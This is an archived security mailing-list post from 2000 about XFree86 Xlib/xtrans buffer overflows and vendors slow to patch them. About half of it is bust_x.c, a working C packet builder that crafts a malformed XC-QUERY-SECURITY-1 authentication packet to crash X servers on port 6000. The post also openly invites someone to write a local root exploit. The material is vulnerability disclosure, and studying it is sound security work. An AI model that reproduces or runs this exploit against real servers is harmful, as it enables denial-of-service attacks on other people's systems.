OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: Re: another Xlib buffer overflow
From: Chris Evans (chrisSCARY.BEASTS.ORG)
Date: Tue Oct 24 2000 - 14:44:34 CDT

On Sun, 15 Oct 2000, Kris Kennaway wrote:

> On Fri, Oct 13, 2000 at 11:37:01PM +0200, Matthieu Herrb wrote:
>
> > It was fixed in XFree86 4.0. From the CHANGELOG:
> >
> > XFree86 3.9Nu (13 January 1999)
> > [...]
> > 2141. Fix some sun_path overflows in xtrans.
>
> Wow, there's nothing like supporting the product release which
> everyone actually uses.
>
> XFree86 did the same thing with the other security problems a few
> months ago (fixed it silently in 4.0.1 and forced vendors who care to
> manually hunt down and extract the patches from their CVS repo and
> apply them by hand to their 3.3.6 package). Mail to their security
> contact address also went unanswered on this issue..

Hi Kris,

Well, I'm sufficiently underwhelmed by response to recent XFree security
issues, that I'm going to throw some fuel on the fire.

Below is a little packet builder which builds the DoS packet which you can
send to X port 6000. I didn't include it in my original advisory, which
may be located at:

http://www.securityfocus.com/archive/1/60869

However, this advisory contained ample information for a malicious party
to derive an exploit packet. This is why I have no problem sending my DoS
packet builder. Hopefully this post might prompt action from slower
vendors (even if it is inspired by irate users).

As well as the DoS issue, a lot of vendors still have the following X
realted issues outstanding (I posted these about the same time as the
original DoS post):

A nasty hole which will almost certainly give localhost root in the
presence of suid-root X clients: [EXPLOIT PLEASE ANYONE?]

http://www.securityfocus.com/archive/1/65699

An irritating libICE DoS, affects GNOME-1.0 desktops:

http://www.securityfocus.com/archive/1/65692 [INCLUDED EXPLOIT]

And, of course, Michal's sun_path overflow which started this thread..

Cheers
Chris

/* bust_x.c
 * Demonstration purposes only!
 * Chris Evans <chrisscary.beasts.org>
 */
int
main(int argc, const char* argv[])
{
  char bigbuf[201];
  short s;
  char c;

  c = -120;

  memset(bigbuf, c, sizeof(bigbuf));

  /* Little endian */
  c = 'l';
  write(1, &c, 1);
  /* PAD */
  c = 0;
  write(1, &c, 1);
  /* Major */
  s = 11;
  write(1, &s, 2);
  /* Minor */
  s = 0;
  write(1, &s, 2);
  /* Auth proto len */
  s = 19;
  write(1, &s, 2);
  /* Auth string len */
  s = 200;
  write(1, &s, 2);

  /* PAD */
  s = 0;
  write(1, &s, 2);

  /* Auth name */
  write(1, "XC-QUERY-SECURITY-1", 19);

  /* byte to round to multiple of 4 */
  c = 0;
  write(1, &c, 1);

  /* Auth data */
  /* Site policy please */
  c = 2;
  write(1, &c, 1);
  /* "permit" - doesn't really matter */
  c = 0;
  write(1, &c, 1);
  /* number of policies: -1, loop you sucker:) */
  c = -1;
  write(1, &c, 1);
  /* Negative stringlen.. 201 of them just in case, chortle... */

  write(1, bigbuf, sizeof(bigbuf));
}